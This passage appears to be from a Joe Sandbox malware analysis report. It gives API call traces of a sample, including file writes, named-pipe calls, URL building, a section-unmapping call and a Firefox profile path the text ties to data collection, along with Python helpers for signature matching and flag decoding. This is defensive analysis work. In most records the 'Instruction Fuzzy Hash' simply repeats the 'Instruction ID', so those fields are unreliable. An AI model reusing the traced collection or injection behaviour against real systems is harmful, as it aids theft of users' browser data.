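`CALL_RE`, `parse_calls`, `normalize` and `api_id` are names chosen for this example.

```python
import re
from collections import Counter
from itertools import groupby

# Constructed excerpt in the report's own line format (record above plus one
# subcall line, to show that subcall lines are excluded from the signature).
REPORT_EXCERPT = """\
APIs
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BA6
  • SetEndOfFile.KERNEL32(01B34303,?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BB2
  • CloseHandle.KERNEL32(01B34303), ref: 01B32BBB
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BC3
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BFE
  • FlushFileBuffers.KERNEL32(00000000), ref: 01B32C08
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32C10
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
Memory Dump Source
"""

# Constructed excerpt where every API is called the same number of times
# (taken from a later record on this page): no '$' separator is emitted.
EQUAL_COUNTS = """\
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
"""

# Constructed excerpt with three distinct call counts (not from the report),
# to show how the rule generalises to more than two groups.
THREE_GROUPS = """\
  • GetLastError.KERNEL32 ref: 00401000
  • GetLastError.KERNEL32 ref: 00401010
  • GetLastError.KERNEL32 ref: 00401020
  • HeapFree.KERNEL32(00000000,00000000), ref: 00401030
  • HeapFree.KERNEL32(00000000,00000000), ref: 00401040
  • memcpy.NTDLL ref: 00401050
"""

# One call line: optional subcall prefix, Name.MODULE, optional (args), "ref: addr".
CALL_RE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-F]+:\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)


def parse_calls(text):
    """Return (name, module, args, ref, is_subcall) for every call line in text."""
    calls = []
    for line in text.splitlines():
        m = CALL_RE.match(line)
        if not m:
            continue  # section headers such as "APIs" / "Memory Dump Source"
        args = [] if m.group("args") is None else m.group("args").split(",")
        calls.append((m.group("name"), m.group("module"), args,
                      m.group("ref"), m.group("sub") is not None))
    return calls


def normalize(name):
    """Drop a trailing ANSI/Unicode suffix so lstrlenA and lstrlenW count as one
    API (assumption: the report shows 'lstrlen' for calls to lstrlenW)."""
    if len(name) > 1 and name[-1] in "AW" and name[-2].islower():
        return name[:-1]
    return name


def api_id(text):
    """Rebuild the report's 'API ID': direct calls only, grouped by call count in
    descending order, groups joined with '$', ASCII order inside each group."""
    counts = Counter(normalize(c[0]) for c in parse_calls(text) if not c[4])
    by_count = sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))
    return "$".join("".join(name for name, _ in grp)
                    for _, grp in groupby(by_count, key=lambda kv: kv[1]))


if __name__ == "__main__":
    print(api_id(REPORT_EXCERPT))  # GetLastError$CloseHandleFlushFileBuffersSetEndOfFile
    print(api_id(EQUAL_COUNTS))    # HeapFreeRtlAllocateHeap
```

Because the signature ignores argument values and subcalls, two functions with the same API ID are only candidates for being the same code; confirm with the Opcode ID or Instruction Fuzzy Hash before treating a match as a shared component.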
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 27
  • API ID: lstrcmpi$GetSystemTimeAsFileTimeRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID: Main
  • API String ID: 3521027233-521822810
  • Opcode ID: bc401ce39ed135578d671bff3c7e0c2395a673578b9a283240c4e40e0584cd5d
  • Instruction ID: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
  • Opcode Fuzzy Hash: 10E02B34084403D7901B60A90C06F18DE4EF3603C8CCE2A65C41129A061B56326E2F3B
  • Instruction Fuzzy Hash: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
APIs
  • lstrcmpi.KERNEL32(00000000,Main), ref: 001C5C44
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5C56
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5C69
  • lstrcmpi.KERNEL32(001EB260,00000000), ref: 001C5C8A
  • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,?,001C9732,00000000), ref: 001C5C9E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 4915370d64bf5c115dcc7df05119504ed8106c73e5c20004021290fc9b098e04
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: A8D0126D078B4ED4D91985A715E2F03E1915F33700E3C460872607926A8B3673AEDF49
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(01B37494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 01B34B26
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B33
  • WriteFile.KERNEL32(00000000,?,00001000,01B37494,00000000), ref: 01B34B49
  • SetEndOfFile.KERNEL32(00000000,?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B54
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B5C
  • CloseHandle.KERNEL32(00000000), ref: 01B34B65
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
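The CreateFileW call in the record above is made with dwDesiredAccess C0000000 and dwCreationDisposition 00000004, the CreateFileW calls in earlier records use 80000000 and 00000003, and RegOpenKeyA is called with 80000001 as its root key. Reading those raw stack values is how a practitioner separates a read-only open from a file that is being created or overwritten, and a per-user hive from a machine-wide one. As an added example that is not part of the Joe Sandbox report, the following Python names the Win32 constants (values from the Windows SDK headers) in an argument list copied from a report line. Joe Sandbox prints the stack slots it could resolve, with `?` for an unknown value, so a decoded slot is only meaningful when the preceding slots are present; the helper and table names (`parse_args`, `flags`, `decode_createfile`, `decode_regopenkey`, `classify_createfile`) are chosen for this example.

```python
# Win32 constants from the SDK headers, limited to the values this report uses
# plus a few common neighbours; leftover bits are reported as raw hex.
GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE_MODE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
CREATION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
            4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FLAGS_ATTRS = {0x80: "FILE_ATTRIBUTE_NORMAL", 0x02: "FILE_ATTRIBUTE_HIDDEN",
               0x100: "FILE_ATTRIBUTE_TEMPORARY", 0x04000000: "FILE_FLAG_DELETE_ON_CLOSE",
               0x80000000: "FILE_FLAG_WRITE_THROUGH", 0x40000000: "FILE_FLAG_OVERLAPPED"}
HKEY = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
        0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}


def parse_args(arg_text):
    """Split a Joe Sandbox argument list. '?' (unresolved slot) becomes None,
    hex values become ints (negative forms such as -00000008 wrap to 32 bits),
    and anything else (".dll", "http://", "Main") is kept as a string."""
    out = []
    for a in arg_text.split(","):
        a = a.strip()
        if a in ("?", ""):
            out.append(None)
            continue
        try:
            out.append(int(a, 16) & 0xFFFFFFFF)
        except ValueError:
            out.append(a)
    return out


def flags(value, table):
    """Name every known bit in value; bits missing from the table stay as hex."""
    if not isinstance(value, int):
        return "?" if value is None else str(value)
    names = [name for bit, name in table.items() if (value & bit) == bit]
    known = 0
    for bit in table:
        known |= bit
    leftover = value & ~known & 0xFFFFFFFF
    if leftover:
        names.append("0x%08X" % leftover)
    return "|".join(names) if names else "0"


def decode_createfile(arg_text):
    """CreateFileA/W(lpFileName, dwDesiredAccess, dwShareMode, lpSecurityAttributes,
    dwCreationDisposition, dwFlagsAndAttributes, hTemplateFile)."""
    a = parse_args(arg_text)
    if len(a) < 6:
        raise ValueError("CreateFile needs at least six captured arguments")
    disp = a[4]
    return {
        "access": flags(a[1], GENERIC_ACCESS),
        "share": flags(a[2], SHARE_MODE),
        "disposition": "?" if disp is None else CREATION.get(disp, str(disp)),
        "attrs": flags(a[5], FLAGS_ATTRS),
    }


def decode_regopenkey(arg_text):
    """RegOpenKeyA/W(hKey, lpSubKey, phkResult): name a predefined root handle."""
    a = parse_args(arg_text)
    if not a or not isinstance(a[0], int):
        return "?"
    return HKEY.get(a[0], "handle 0x%08X" % a[0])


def classify_createfile(arg_text):
    """Coarse triage label: 'write' if the open can create or modify the file."""
    d = decode_createfile(arg_text)
    creates = d["disposition"] in ("CREATE_NEW", "CREATE_ALWAYS",
                                   "OPEN_ALWAYS", "TRUNCATE_EXISTING")
    return "write" if "GENERIC_WRITE" in d["access"] or creates else "read"


if __name__ == "__main__":
    # Argument lists copied from CreateFileW and RegOpenKeyA lines in this report.
    for args in ("01B37494,C0000000,00000000,00000000,00000004,00000080,00000000",
                 "00000000,80000000,00000001,00000000,00000003,00000080,00000000"):
        print(classify_createfile(args), decode_createfile(args))
    print(decode_regopenkey("80000001,001EC2F4,00000000"))
```

The write-classified open with OPEN_ALWAYS, followed in the same record by WriteFile, SetEndOfFile and CloseHandle, is the pattern to look for when deciding which of these functions drop or rewrite files on disk; the read-only opens with OPEN_EXISTING are the ones to pair with the `%APPDATA%\Mozilla\Firefox\Profiles` string when tracing what the sample collects.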
Similarity
  • Total matches: 57
  • API ID: SetLastErrorSleepWaitForSingleObjectmemset
  • String ID: vids
  • API String ID: 1012678829-3767230166
  • Opcode ID: a88323ab6a07f6567de602f156fbacf356d172862014bdadb632bb7e4ac17ede
  • Instruction ID: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
  • Opcode Fuzzy Hash: E1216B4906CCE1E3D8E268440463F6D32146F83DFAD4DA72667BE9A6D75F012306D629
  • Instruction Fuzzy Hash: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
APIs
  • memset.NTDLL ref: 001DD3C6
  • SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD348: GetSystemTimeAsFileTime.KERNEL32(00000001,?,?,?,001DD513,?,00000000,00000000,?,?,?,?,00000000,?,?,?), ref: 001DD351
    • Part of subcall function 001DD348: _aulldiv.NTDLL(00000001,?,00002710,00000000), ref: 001DD364
  • WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
  • Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 19
  • API ID: RegCloseKeyRegOpenKeySetEventWaitForSingleObject
  • String ID: %APPDATA%\Mozilla\Firefox\Profiles
  • API String ID: 2346524515-3215297822
  • Opcode ID: 04e48ca811839595ab19984103b0a713a9098f9930145295782b9b8a8acae543
  • Instruction ID: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
  • Opcode Fuzzy Hash: 64110C72556761C8C9256C84281E37A35C3FA833D3D2C7703EDA071A8B4B8261ECBD98
